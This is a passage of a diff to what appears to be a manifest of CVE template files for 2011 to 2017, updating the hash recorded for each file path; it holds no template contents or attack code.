-http/cves/2011/CVE-2011-5107.yaml:6500479dea5a2baa7dda98cf15ac603c80dd88ee -http/cves/2011/CVE-2011-5179.yaml:6b1bc0308f5843e6e8214c7689ed7ce2cdd3d067 -http/cves/2011/CVE-2011-5181.yaml:da332c9c71b49255b7372933d6e043a6ef920e0f +http/cves/2011/CVE-2011-5107.yaml:384f8a35f24d97bb7c5e52fd3ace85e938aa6d44 +http/cves/2011/CVE-2011-5179.yaml:c1319b4ced7c9613ecf11b80224f0a4d02589bf8 +http/cves/2011/CVE-2011-5181.yaml:a79dd1f184f95395c750e3eb4babfdf01cf11d26 http/cves/2011/CVE-2011-5252.yaml:cd6677a2e68a410e579dca0dbfb4b0f6cdd87bee -http/cves/2011/CVE-2011-5265.yaml:ef1fc0051980989f0fa31ae918c337a47a442db4 -http/cves/2012/CVE-2012-0392.yaml:7c64dbe978e836fc59f6fe89079f873f75b1721a -http/cves/2012/CVE-2012-0394.yaml:3ab9ca9bbcc1d4b09c6bedef8f16cac4046daca9 +http/cves/2011/CVE-2011-5265.yaml:9883b8a3053ee209cd002e98d46409a3ab67207e +http/cves/2012/CVE-2012-0392.yaml:f29dda318dcd437bcb835ef98c66a715ed2d1d05 +http/cves/2012/CVE-2012-0394.yaml:e7585f6052afcc2a24014ecb20446b9b59cfa719 http/cves/2012/CVE-2012-0896.yaml:6498f3a54562aa157b18d08b02019ba3e358abf4 -http/cves/2012/CVE-2012-0901.yaml:546493d6d7a6c219656b5977b297de328c74dfe4 +http/cves/2012/CVE-2012-0901.yaml:7ed659172da7ff72972f14938ad31078db204bb5 http/cves/2012/CVE-2012-0981.yaml:4fb0cb2ce3a9d97e83dfa0d6a57bf66a7c22ea01 -http/cves/2012/CVE-2012-0991.yaml:eaced68f949dc463ae65022d791fe72f15da690b +http/cves/2012/CVE-2012-0991.yaml:86a2e43a7e7b407e4322b3f1b1ec3be6c3e22567 http/cves/2012/CVE-2012-0996.yaml:891c0651137f2e947c6b1b9e438cba3edb33ec77 http/cves/2012/CVE-2012-1226.yaml:3de9396fb896c545ce2f8e8a121e0203565bc963 http/cves/2012/CVE-2012-1823.yaml:da276ae6c59ea82eb9dee085c7bc8f3e6de4f7df -http/cves/2012/CVE-2012-1835.yaml:4dfa20f76fbaab9369e068c7e768b62db01016cb -http/cves/2012/CVE-2012-2371.yaml:010260ccc1dec8ac14c6288bfe9789c28817fed5 -http/cves/2012/CVE-2012-3153.yaml:7745803a79c081e0d4cf1ab008315da194440504 -http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 -http/cves/2012/CVE-2012-4242.yaml:c0f6cf73a75459db549d052fc5621421c16c07e1 -http/cves/2012/CVE-2012-4253.yaml:b751e39074389ddfe21a53c9639721af4366933d -http/cves/2012/CVE-2012-4273.yaml:f257338bd89ce77ac23d22e5beb22d089492fd2b +http/cves/2012/CVE-2012-1835.yaml:ef7c7090c9015ba56ac1dd6e9c522f264443c0ec +http/cves/2012/CVE-2012-2371.yaml:7e3b3b6140f61f065c6fb7c31ec2fcf69f56a0af +http/cves/2012/CVE-2012-3153.yaml:a979103bab4d0a56ca464505fdf3d72d5b49a56d +http/cves/2012/CVE-2012-4032.yaml:af54faeb1b7b5a0ba19ab843eee4976e6886fc11 +http/cves/2012/CVE-2012-4242.yaml:d387d7dec215be29263479571e7dad9d42195324 +http/cves/2012/CVE-2012-4253.yaml:0edf97cbecfabf09c4ca6a9467e68adb4e89ec25 +http/cves/2012/CVE-2012-4273.yaml:f768fba71858d3b55621c2a7f48e4ef4392ff4f1 http/cves/2012/CVE-2012-4547.yaml:b5596c4a4096d71d32c140095bcc319dfdbfa17a -http/cves/2012/CVE-2012-4768.yaml:21af07fadcfe0dc640ce7ff9d1f4a1b228fdc86a +http/cves/2012/CVE-2012-4768.yaml:5ccdf74af228ad6bfea89640c64850710583a945 http/cves/2012/CVE-2012-4878.yaml:1ef5a93dda472a401d0e59d4e7e8382441ef842c http/cves/2012/CVE-2012-4889.yaml:9e23549c59a9109c5c9e1a4ad29fc0537cc59037 -http/cves/2012/CVE-2012-4940.yaml:0788c7af85578fd5462ba3646fe3a489281a3326 +http/cves/2012/CVE-2012-4940.yaml:7146ba0dbf228efe43059670cdd4ad8ae53ae7c1 http/cves/2012/CVE-2012-4982.yaml:fa88c9844f314ec9df1cd44e460349e3a059cc03 http/cves/2012/CVE-2012-5321.yaml:36fde02c90c4dbe92b7e3b91a097fdc47ea72622 -http/cves/2012/CVE-2012-5913.yaml:5879951c8bd0c95f891b1d4d905fdb30a58514a7 +http/cves/2012/CVE-2012-5913.yaml:f1c3ff8cabe57d45539c3a3b07b20f89b9a89421 http/cves/2012/CVE-2012-6499.yaml:ad1f16e453fb178d32bfe6d97ec0c43da94f89c5 -http/cves/2013/CVE-2013-1965.yaml:420bbbd2807e0e9ca792eca0b3276c4e9f33d532 -http/cves/2013/CVE-2013-2248.yaml:e57458e18f8bf89c1c94678413ff15e8770afd60 -http/cves/2013/CVE-2013-2251.yaml:8eb669224beb43e0a5fb9ccc459495b67b116a01 -http/cves/2013/CVE-2013-2287.yaml:eb52bfef9137b46e70a13c0fd474d1f0dd2d4656 +http/cves/2013/CVE-2013-1965.yaml:50e2b3039c13a0e7aeedb95ae11c0b143aac0c53 +http/cves/2013/CVE-2013-2248.yaml:fafdbc51610f155e845f6782a9dea0aaccd05ace +http/cves/2013/CVE-2013-2251.yaml:738e95efdaf8edb1dc662a4cec1f5b28b7b5a2ba +http/cves/2013/CVE-2013-2287.yaml:500aa8ad9cc4b23995e4ffef813941af4e966fde http/cves/2013/CVE-2013-2621.yaml:b119a307b339c8bdf9fd8de85ac33095943fe5bd -http/cves/2013/CVE-2013-3526.yaml:053fb4c1ba82c992e5006914d806c5f7ad89c591 -http/cves/2013/CVE-2013-3827.yaml:bb6196380c0971025f32a3bb62ab1262fc1feda6 -http/cves/2013/CVE-2013-4117.yaml:507a06ea58b71624b0c31c362506ee171b939391 -http/cves/2013/CVE-2013-4625.yaml:3b0e121cf1eb47258d888c4ecdd220790a2d2514 +http/cves/2013/CVE-2013-3526.yaml:03d663e28dfdc74ccdca26d28cf70e9e6c2427fd +http/cves/2013/CVE-2013-3827.yaml:e8ec39c341e6ead36e8d2de03a02c08df99756b1 +http/cves/2013/CVE-2013-4117.yaml:da45c051a6a735a2aa0f7576acdd9385f067a9e7 +http/cves/2013/CVE-2013-4625.yaml:6c3d257c2f145977b2b4487e9e7c328f9657aae0 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea http/cves/2013/CVE-2013-5979.yaml:c1439b35c3ea1ab4d7f5ed19ccc670b75094c431 http/cves/2013/CVE-2013-6281.yaml:a8aca0c3a8f4ca7f993970d911143adde9144d8e -http/cves/2013/CVE-2013-7091.yaml:e238a53f639eb74a475752c5356e01e1150f95fc +http/cves/2013/CVE-2013-7091.yaml:0bab2f4d7b210c62f78b5ad7ff3dde1743eab87e http/cves/2013/CVE-2013-7240.yaml:4ff6b9c5fc7d8c94d20690a220d7618948a20b86 http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 @@ -1120,33 +1120,33 @@ http/cves/2014/CVE-2014-2383.yaml:d7ab3d6309e5ac9d06941842603e42cc5ac47e4d http/cves/2014/CVE-2014-2908.yaml:d3abb494ed31a8fe1ba4417c33341523a40a8063 http/cves/2014/CVE-2014-2962.yaml:53fac318582c4e243b9e5145fce965ed95428f90 http/cves/2014/CVE-2014-3120.yaml:852e796db8a1ff729eac94d10d725c2d92ca47d7 -http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a -http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 +http/cves/2014/CVE-2014-3206.yaml:23c5293e47729fcc8a75197777f571a2ef3a1904 +http/cves/2014/CVE-2014-3704.yaml:17386b88e3c0307c382c8068a2db3a3e1a9ea785 http/cves/2014/CVE-2014-3744.yaml:8fd97d3e288c8c134d50e3b670ef5c2ee23dd8df -http/cves/2014/CVE-2014-4210.yaml:4f7ce22b95de4f25135ce21ef24a481440fd3ff7 -http/cves/2014/CVE-2014-4513.yaml:f773b0ae252939028612a224507f9815e8af7c49 -http/cves/2014/CVE-2014-4535.yaml:5ea240904288e526982f8498a054c0f81060814b -http/cves/2014/CVE-2014-4536.yaml:c45991420328d9bcdbb3eaf2aea30726c7c162f8 -http/cves/2014/CVE-2014-4539.yaml:e4078f1d6f7af2ae149936f2a34e9ec6a7047313 -http/cves/2014/CVE-2014-4544.yaml:9b348c6784b4e52f72f556420bdeebf266b0c266 -http/cves/2014/CVE-2014-4550.yaml:d91b194e084d6abcb57601e52751f8de18ac94d4 -http/cves/2014/CVE-2014-4558.yaml:fa8f68a1865e8463aab7b7648d00939186f6d6b2 -http/cves/2014/CVE-2014-4561.yaml:510ee96cb131f1235bcaaed0e70a67fecec141ce -http/cves/2014/CVE-2014-4592.yaml:04d3f44b089e28ea1d584bead8b557aee3d12f63 +http/cves/2014/CVE-2014-4210.yaml:3776be1d24f6cb9defa303f35ab62751006f267d +http/cves/2014/CVE-2014-4513.yaml:fd4f4506311c47fc629d0b82b43fac746952da30 +http/cves/2014/CVE-2014-4535.yaml:081e8b92e77dfa59330e6b421ac9c3a2c9fb0797 +http/cves/2014/CVE-2014-4536.yaml:f89941018aa2ea90d816894185097dc875f7dd00 +http/cves/2014/CVE-2014-4539.yaml:5fb23d5641a7ca552a34560f1cfeb912f4846100 +http/cves/2014/CVE-2014-4544.yaml:2658ec1adfee8c0fd2aaaee7ec873812c79d183b +http/cves/2014/CVE-2014-4550.yaml:82a8887d7608ad4fc26b88d9fa9ad06e927abc93 +http/cves/2014/CVE-2014-4558.yaml:36bc6ff35d6ed975d60dbfd3ac758b692a4d0c83 +http/cves/2014/CVE-2014-4561.yaml:77e83f397ce7c91326feed1920fffc4cfd8f3a1e +http/cves/2014/CVE-2014-4592.yaml:dce16f8414cb872a0cb5ad32e9a6861a5769d9ce http/cves/2014/CVE-2014-4940.yaml:136ffe1784b6c7bb206c326d2652dcdcaef7552f http/cves/2014/CVE-2014-4942.yaml:ca31e2efcd6b8e2593546a1951f70b3a0291d9b6 http/cves/2014/CVE-2014-5111.yaml:41b3e9480d86bc114cc55c99a0fbcc65563b6616 http/cves/2014/CVE-2014-5258.yaml:b25628942848bdd5962b6a5c9e52af5930597f67 -http/cves/2014/CVE-2014-5368.yaml:a164c0d868655690541a180330c2ee48979fff2f +http/cves/2014/CVE-2014-5368.yaml:6d112d60b23f78a4296ce7545a6b9521facb727d http/cves/2014/CVE-2014-6271.yaml:c336b5b85934da1f43ce4d185e09796b4fd70e4e http/cves/2014/CVE-2014-6287.yaml:3c4729bdae68ac1479d19f6720fffddbb26d262f -http/cves/2014/CVE-2014-6308.yaml:aa88544552c7b66b74ede5bf9e0b134edbf863fa +http/cves/2014/CVE-2014-6308.yaml:e089ead32174bf9fdb4265a2e0dd35dad2018a0e http/cves/2014/CVE-2014-8676.yaml:0cfe4b8a24bcb2b98dd9549cb2d1c39585200dd2 -http/cves/2014/CVE-2014-8682.yaml:dc6b4228d0435ef2d1a27f769cc058c103c914d2 +http/cves/2014/CVE-2014-8682.yaml:f52669a4d02c8dbcbd1bc427038f39bf2ae25b86 http/cves/2014/CVE-2014-8799.yaml:e2899a7c8ca8196f7138c225e30af40dbef8fd05 -http/cves/2014/CVE-2014-9094.yaml:13aebc2fd2c559c5ee127d7c8ddc0dbb681c84fd +http/cves/2014/CVE-2014-9094.yaml:fcafea40a4f65c4aaa4bcb84664f37bd35ef73a6 http/cves/2014/CVE-2014-9119.yaml:f1cd0ce2c6014b22a0cf943c0ea4a3d58fc147e6 -http/cves/2014/CVE-2014-9180.yaml:9efe6be2df197e7bc5265ad0eaf75f897a69f63a +http/cves/2014/CVE-2014-9180.yaml:2c5abaa406e7cafd49261cee3e4318c171003266 http/cves/2014/CVE-2014-9444.yaml:f33dc2ffea4e7307bfd997daad8cd6bccc82d266 http/cves/2014/CVE-2014-9606.yaml:b85356b15dad93b20df3cc8884e727d57733b88c http/cves/2014/CVE-2014-9607.yaml:bfc63136609830a20e576b4a70729a9706e1c841 @@ -1161,112 +1161,112 @@ http/cves/2015/CVE-2015-1000005.yaml:6bbb08fc5f35845e1796eec9f53f682f39a0b7d1 http/cves/2015/CVE-2015-1000010.yaml:080f04e2df67eb050ba392f3bf8ef27a87abdd05 http/cves/2015/CVE-2015-1000012.yaml:c4d338e114a302fa98bf87eb0a3e1255419d74eb http/cves/2015/CVE-2015-1427.yaml:2cceec2e205f316b1fc790135f3c66b11075118d -http/cves/2015/CVE-2015-1503.yaml:bc85d23c04ac419bcbe58da76af9d044a52dcfd4 +http/cves/2015/CVE-2015-1503.yaml:561b513b374afd9e4fb928590522d472c772b763 http/cves/2015/CVE-2015-1579.yaml:52b616d917b5e92f3ab3b1732938e62af4957557 -http/cves/2015/CVE-2015-1635.yaml:791a7cf31afd4b27a3585149cfaadbdc1e953860 -http/cves/2015/CVE-2015-1880.yaml:9def22edba12734986460f999e854217643e7880 -http/cves/2015/CVE-2015-20067.yaml:77e222d17ecb3663400b5bb143f2ab56845043b2 -http/cves/2015/CVE-2015-2067.yaml:2835680c4edd735249eefa325c2ab2af801136d4 -http/cves/2015/CVE-2015-2068.yaml:ddfed860ffa4852c598513ec68a14893b264a396 +http/cves/2015/CVE-2015-1635.yaml:964e8edbd94bf69e01343d32a45edd3a41a81e33 +http/cves/2015/CVE-2015-1880.yaml:2106dedecc0089ac5f079dce8bd3811a12347c7b +http/cves/2015/CVE-2015-20067.yaml:e742bde1ee621ed13a8f00727657ddb135e518c1 +http/cves/2015/CVE-2015-2067.yaml:e9366e488197cbcce943f06f9d3836513ce5611e +http/cves/2015/CVE-2015-2068.yaml:9b962a2f2719c7b2e4ca5593fa5b50f05d3cbece http/cves/2015/CVE-2015-2080.yaml:b232c65718854a1049244802081c696ecc31eb82 http/cves/2015/CVE-2015-2166.yaml:2869726e68902758b097a2b7f02925968ef0aeff http/cves/2015/CVE-2015-2196.yaml:bd31271f82bc747db7d750a1d9890ed09c4192d3 http/cves/2015/CVE-2015-2755.yaml:ac90343bbd36f1d7328d675ac69317f3ae2a46bd -http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 -http/cves/2015/CVE-2015-2807.yaml:459c579131720fd9cdda80c3d0ef2224c6666b35 +http/cves/2015/CVE-2015-2794.yaml:71b609abc6ba3a2acb4d21f71c110da683d029ba +http/cves/2015/CVE-2015-2807.yaml:f243265d74f0d7094d38efc9782985a1b0ff35a1 http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f http/cves/2015/CVE-2015-2996.yaml:24c0c2213add5edba15d035eb9690636f24e3999 -http/cves/2015/CVE-2015-3035.yaml:b4346900d07331df73e331062ff50d71b17b221c +http/cves/2015/CVE-2015-3035.yaml:b49930ad5938f020e483e39c14be0d41e277c5ff http/cves/2015/CVE-2015-3224.yaml:f1b418ea3923fe6ce83982865ea6a8f4196b23fe http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 -http/cves/2015/CVE-2015-3897.yaml:7e151eb750e3c1602ea9cb1aa3e9a2d68ca31770 +http/cves/2015/CVE-2015-3897.yaml:f6c517ef234c23ab58341e440183887086535cc7 http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 http/cves/2015/CVE-2015-4062.yaml:8c16e8680fcb2c9c9a9cea48e3dfac365c09fdcd -http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 +http/cves/2015/CVE-2015-4063.yaml:480de1365099b9855f4e9621a70599f7801abe7e http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 -http/cves/2015/CVE-2015-4127.yaml:7a03956081adf3e4490a32ad4fbb5cba1dab766f +http/cves/2015/CVE-2015-4127.yaml:3deb3fad38b9a3f2e96ba44b7a7cefda2206c7c3 http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:a763c5deb0c742232e489d143dd154c0ea2b4fa0 +http/cves/2015/CVE-2015-4455.yaml:4a7764b6d1c95209cf305e09f3f30feb2c7895aa http/cves/2015/CVE-2015-4632.yaml:8b2f1aa45ef9876de13f529f40b0ad7698ab1dc8 http/cves/2015/CVE-2015-4666.yaml:4ce784f10bfa966a6f5ecf859b9a80850a6c2aae http/cves/2015/CVE-2015-4668.yaml:7b1b38f3c97bb09484a822df734f429e136deed9 http/cves/2015/CVE-2015-4694.yaml:fb0332f2f71695e7eaea56de97197ef7924b5fcc http/cves/2015/CVE-2015-5354.yaml:628f69500fd63d21bb4637dcb719434c1f5aa353 http/cves/2015/CVE-2015-5461.yaml:ccdf5da24f86d86ab0916171941d351a5ebcc120 -http/cves/2015/CVE-2015-5469.yaml:993b7db9108784f0a7abb12ef8b33c5d5c1cc68e +http/cves/2015/CVE-2015-5469.yaml:96ca2b4aae65ac3849219d8d0c070e7e119154db http/cves/2015/CVE-2015-5471.yaml:b4ab394eb025425254e020ef76d91a62d84c88af http/cves/2015/CVE-2015-5531.yaml:7298c9d71d9bfe34269c16623a7676de7fc6fd09 http/cves/2015/CVE-2015-5688.yaml:b4a080196c1edcc203a9c220392daaa98837e7ed http/cves/2015/CVE-2015-6477.yaml:9255a94059eced9c3b57520ad58ac346f15c8d2b http/cves/2015/CVE-2015-6544.yaml:b3e7f972c791e433d02747d3a2f15e2b93dd5128 -http/cves/2015/CVE-2015-6920.yaml:010bca7f3c3d63174ad513216c778c12be764930 +http/cves/2015/CVE-2015-6920.yaml:aebfa8ec1754a73a3491066884b3a28b1e2b4164 http/cves/2015/CVE-2015-7245.yaml:f5ff558dc2e6aaf7c6fddea351eef15b0fc314b0 -http/cves/2015/CVE-2015-7297.yaml:cba00035af3c1fdb376e38b8f87019b2d7c0b9f6 +http/cves/2015/CVE-2015-7297.yaml:0e3409721e707b2ab9f87b089935ec3d8b23e607 http/cves/2015/CVE-2015-7377.yaml:91d20f0b6f6c80a103811c9c813ae2d8c9c6f766 -http/cves/2015/CVE-2015-7450.yaml:d31f750f627aa509eb258c5cfa04016818a1aba6 -http/cves/2015/CVE-2015-7780.yaml:19bbe0743719cd540cad1b1410f9530780893a6f -http/cves/2015/CVE-2015-7823.yaml:1d3cfb653a6a3c4f3215e29c1fa33b7ec523c5a6 +http/cves/2015/CVE-2015-7450.yaml:bfc13fd83578bebbcca5de65b287e75b1309e57d +http/cves/2015/CVE-2015-7780.yaml:094b678bafc06744c06b1a374b1c90787bd2b64f +http/cves/2015/CVE-2015-7823.yaml:7e32266f3669c3838587a1fc5c57dc8fb0bd75c1 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 -http/cves/2015/CVE-2015-8399.yaml:88082e1686fa05ae008feb2f2d6a0eeba15d8696 +http/cves/2015/CVE-2015-8399.yaml:5ebee8fc30e297250baecdd83da02e9898760f1f http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc -http/cves/2015/CVE-2015-9414.yaml:44f53443a463d463c575726eec3ff5192b2bcb27 +http/cves/2015/CVE-2015-9414.yaml:a6a0919e3c31eb44f95d9ce4f3b6ecd4c7c7bec6 http/cves/2015/CVE-2015-9480.yaml:70993e12643bcf8303d221fa8475aff4a9c0c1de -http/cves/2016/CVE-2016-0957.yaml:2e39ae03a9d122b13acb44740c3f74563d68e089 -http/cves/2016/CVE-2016-1000126.yaml:d820a62f82342e8c68f0b56000bcfb1d3ee196ff -http/cves/2016/CVE-2016-1000127.yaml:79570d7e9d206139992c889d1f314c8cd58b437a -http/cves/2016/CVE-2016-1000128.yaml:42f74b0e57adf59effe7e114152a36202d61eb6c -http/cves/2016/CVE-2016-1000129.yaml:6a9354109374ffdb6807cff25eb83aaebb9e58a2 -http/cves/2016/CVE-2016-1000130.yaml:1f43e1aba00fb7e7bb30af51d831b340e5ab6ba2 -http/cves/2016/CVE-2016-1000131.yaml:f447ecc5dc9268216d688e5bb54dc08e9821e892 -http/cves/2016/CVE-2016-1000132.yaml:cbe226168be37f3644a070a0dd06f39419676b95 -http/cves/2016/CVE-2016-1000133.yaml:781637a2b99455aaa3cef306979240fa8d66faed -http/cves/2016/CVE-2016-1000134.yaml:09dbf84e0e4ddff69119ae612f2cdf3f21c7675f -http/cves/2016/CVE-2016-1000135.yaml:5984d6af6ad7e94cd4dcf61907054f9dfd449c96 -http/cves/2016/CVE-2016-1000136.yaml:5ee948fb4f7e2df7f4acf3e1ffdf28e9dfaf5322 -http/cves/2016/CVE-2016-1000137.yaml:2e2b998b96166d5bcab21989bd157ce566053d0b -http/cves/2016/CVE-2016-1000138.yaml:b3d7023d5fec09ee08535602972a17fff99e7767 -http/cves/2016/CVE-2016-1000139.yaml:8b0948303469e93387ad15ba7c7d26ddd0864b29 -http/cves/2016/CVE-2016-1000140.yaml:824295a403f50be40c0442f34403855e9a1d472b -http/cves/2016/CVE-2016-1000141.yaml:685f6855bd21008a3b9a651a785a986d1e4226a9 -http/cves/2016/CVE-2016-1000142.yaml:b8a04a9d4af50f122b340fdfed9235b0186960df -http/cves/2016/CVE-2016-1000143.yaml:27bb71d021209094b538c07f4f52733dbc941fbd -http/cves/2016/CVE-2016-1000146.yaml:0f4feb40b92ac6e9e336bc76a07d46ff7071f845 -http/cves/2016/CVE-2016-1000148.yaml:b2a8951e2d3e0eb40a2e5cceb0ad8f3693231a47 -http/cves/2016/CVE-2016-1000149.yaml:b823989eee6c8387d73e2612cd6c66d34822f8d9 -http/cves/2016/CVE-2016-1000152.yaml:d94328828fbf18aba5ef94afb0bd4df113377769 -http/cves/2016/CVE-2016-1000153.yaml:918980710b38127ac9e1da9cdeb7424b9ee7b74f -http/cves/2016/CVE-2016-1000154.yaml:9f5e685ba1c82c03aa4ed980453f43ac1cb764a0 -http/cves/2016/CVE-2016-1000155.yaml:66e029ab0a6d4162a214f753b05749ac684570b3 +http/cves/2016/CVE-2016-0957.yaml:8f172a70cff48b9ca689f3ec50693d5163354260 +http/cves/2016/CVE-2016-1000126.yaml:5757c086a103ee514e9ad59f809bb5ed32914de7 +http/cves/2016/CVE-2016-1000127.yaml:e886c0aa8ec7de12b7daaa9e7d67f6a7f98c4e90 +http/cves/2016/CVE-2016-1000128.yaml:5cfcbb656f182548afe46b2f4090cde1303ed86d +http/cves/2016/CVE-2016-1000129.yaml:e84e7696f44528ad1160ff7c92c88316058599d4 +http/cves/2016/CVE-2016-1000130.yaml:a55d1c2cdd98a56880b173b62754ae32e279df58 +http/cves/2016/CVE-2016-1000131.yaml:7db6e9daa94a39020c7aa5e16ce95e7707694498 +http/cves/2016/CVE-2016-1000132.yaml:5ae54255788cd600cdd9d2e31bdda7a42de30d09 +http/cves/2016/CVE-2016-1000133.yaml:28d3da4470396a8d946057d09b2ae08f7bffc25c +http/cves/2016/CVE-2016-1000134.yaml:4826a86e0c12527f69593079b8b529dad91fefac +http/cves/2016/CVE-2016-1000135.yaml:efcc6864de6f8908dcd54be892f2309ddb71d9c1 +http/cves/2016/CVE-2016-1000136.yaml:5e8284b806240827aba2d3624d7bd0bb17e77a00 +http/cves/2016/CVE-2016-1000137.yaml:f6c4dbbf6161625b3e65ff25abeb727277b84687 +http/cves/2016/CVE-2016-1000138.yaml:dd1278baf3c2b88b0a5eeb6c14c39ecf5b5773cb +http/cves/2016/CVE-2016-1000139.yaml:d6c6dd0fbc906699ff51e576e2fd5d33efd1c9a6 +http/cves/2016/CVE-2016-1000140.yaml:e65548868142c8562d51f5899be309f1a64d52ca +http/cves/2016/CVE-2016-1000141.yaml:58dee554d0d0adee4b7650f7d8b50c576bca4935 +http/cves/2016/CVE-2016-1000142.yaml:76f7462e00dbffda6aebae536901a9a8611745e0 +http/cves/2016/CVE-2016-1000143.yaml:0f5b638a408d9fd1ab7b5eac55fb0cedf91f2109 +http/cves/2016/CVE-2016-1000146.yaml:03157286b043f77cd3a16dd3d4fb58097d871364 +http/cves/2016/CVE-2016-1000148.yaml:b92aa0495f11d6199c856231c3c6b7e917fb82c9 +http/cves/2016/CVE-2016-1000149.yaml:ac864a89750fe4c7aecf6f9b2603df04ca1efaa8 +http/cves/2016/CVE-2016-1000152.yaml:c08196449cbdcd383f36e9a2203838fb361c9321 +http/cves/2016/CVE-2016-1000153.yaml:8f5586d2ab7c1861ddda448c9c863d5c0176352c +http/cves/2016/CVE-2016-1000154.yaml:6593c7e7a87393362dd202e0112e035cbebcfd32 +http/cves/2016/CVE-2016-1000155.yaml:1cbc627138b59462ab809e80e6b99eb510fc9e9b http/cves/2016/CVE-2016-10033.yaml:46d3745bada72633018639374e9274917e64c42c http/cves/2016/CVE-2016-10108.yaml:d294a26723fb6dd081c30acc03ecfdfe3ebaeace -http/cves/2016/CVE-2016-10134.yaml:cd8be7b6b0f67be8cb711fac99045e3498296317 -http/cves/2016/CVE-2016-10367.yaml:f88f3b6e7d95ec3ef277bdb9602bf4d1f1c056ab +http/cves/2016/CVE-2016-10134.yaml:41b69102acd6067e88bc81e2d02e67164478db3f +http/cves/2016/CVE-2016-10367.yaml:a1fa2076ca38f2150e8f2723650188d4263342a8 http/cves/2016/CVE-2016-10368.yaml:18a03211359f0c24af9c4b6160d1c0ef2b2215d4 http/cves/2016/CVE-2016-10924.yaml:09bb7f7b66f894172c675bb3d36ef59589aa88c1 http/cves/2016/CVE-2016-10940.yaml:180cd258d3c386e8bba06f4d17e019d36486d58f http/cves/2016/CVE-2016-10956.yaml:6fd083b2e80dd090fececf6794043d2a136eaadd http/cves/2016/CVE-2016-10960.yaml:b712cb8e00ee7b482822de5367d1981a182200d6 http/cves/2016/CVE-2016-10973.yaml:5607fa845f3c04fce8d349a6bce10be3bc9fd814 -http/cves/2016/CVE-2016-10993.yaml:7c95f86a87dba06de19b0c7c9974dacb82e09dee +http/cves/2016/CVE-2016-10993.yaml:9313ef77f1af515c9a065c5360bd459659c5d40a http/cves/2016/CVE-2016-1555.yaml:43cc763cb62fa934d7686f2ae4177a663ce52599 -http/cves/2016/CVE-2016-2389.yaml:e68d84e200ee7ff552bde70a22a6ee13d2b7e3ff -http/cves/2016/CVE-2016-3081.yaml:325162185e24455dad06d62debd2587b4a1ef985 -http/cves/2016/CVE-2016-3088.yaml:10f622b6bcf9495bdbdfb8ad8094212ca42ade19 -http/cves/2016/CVE-2016-3978.yaml:50194a7bb856d34897330f6abfb36130e4d3296f +http/cves/2016/CVE-2016-2389.yaml:d18fdca70a400532b4081196d99aea9f94e08200 +http/cves/2016/CVE-2016-3081.yaml:cc9eabfd9af4114c8ff9099e670c305c7750ca1a +http/cves/2016/CVE-2016-3088.yaml:ee8c0cc31d3ea08542a19108f27f0694600072a7 +http/cves/2016/CVE-2016-3978.yaml:b45cad2ea0820255d0b927e7dd421a57f938f676 http/cves/2016/CVE-2016-4437.yaml:4d774c5cc985a117d6a2214f892423f5c636d32e -http/cves/2016/CVE-2016-4975.yaml:628966f69a92b4056fdaf6c7fce5828958631dd5 -http/cves/2016/CVE-2016-4977.yaml:ee48ddeac3b6d5461bc8980481e880af947436db +http/cves/2016/CVE-2016-4975.yaml:61b8f4be3c80738be145b94fb207227de70dd752 +http/cves/2016/CVE-2016-4977.yaml:e306fea6d2dc0cc2620e4e256b7e02a910a14d52 http/cves/2016/CVE-2016-5649.yaml:beebd1faee4723faa26e1f0fe5a73e59628c2cfa -http/cves/2016/CVE-2016-5674.yaml:d0634ea9f19d47d72147befa933456f64520f566 -http/cves/2016/CVE-2016-6195.yaml:77519659bb0d9bbe21181153fe3dbb89ad7d99f9 -http/cves/2016/CVE-2016-6277.yaml:c93b89da0c42f6e280440504cb3dd67c981a8d17 -http/cves/2016/CVE-2016-6601.yaml:afa3f46e2bae4d3e90c1f403147d3e8a5b7d5739 +http/cves/2016/CVE-2016-5674.yaml:c7cfcd28017e1b6f7d0fa01e91e4e716aec9c230 +http/cves/2016/CVE-2016-6195.yaml:5c4ca353df264e6292f5059f0ff75e7b93227ef0 +http/cves/2016/CVE-2016-6277.yaml:2eabec66334368718a754c8957826f626a896aa5 +http/cves/2016/CVE-2016-6601.yaml:ce009e999f92b2c8a8ab7e97b8c274e9d3c57611 http/cves/2016/CVE-2016-7552.yaml:39fc5904a9dca99e15f19f2436b6b431b73c0446 -http/cves/2016/CVE-2016-7834.yaml:11e35334c12e72dab14682a71d851436eb898e8e -http/cves/2016/CVE-2016-7981.yaml:a2e0b9e42c515b9502621de3a809739bdb990538 +http/cves/2016/CVE-2016-7834.yaml:0802bf4fcd3dd1476fc591725f1f87359e146ec1 +http/cves/2016/CVE-2016-7981.yaml:5b8ec0843d4f6ce5dd3652b17b25cfcc94e9cef3 http/cves/2016/CVE-2016-8527.yaml:0dc95f94bd9750d11ae4886a5e0c6b15d70b065e http/cves/2017/CVE-2017-0929.yaml:0d7a93b1f9d88b35c44d9f9ca56eccc62f865358 http/cves/2017/CVE-2017-1000028.yaml:2ff0a301c6342c6a2c19b297accdecc6d48d8b78 @@ -1275,181 +1275,181 